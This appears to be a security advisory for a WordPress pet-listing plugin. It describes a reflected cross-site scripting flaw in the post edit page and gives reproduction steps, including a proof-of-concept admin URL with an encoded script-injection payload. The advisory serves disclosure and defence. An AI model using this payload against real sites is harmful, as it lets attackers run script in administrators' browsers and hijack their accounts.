Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
1. Add a pet and publish the listing 2. View the pet on the frontend of the site and get a valid post id (found on the `` element as a class (i.e. postid-9
) 3. Make a logged in admin open a link: https://example.com/wp-admin/post.php?post=__POST_ID__HERE__&action;=edit&cmb;_force_send=true&cmb;_send_label=test%27%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
4. See the XSS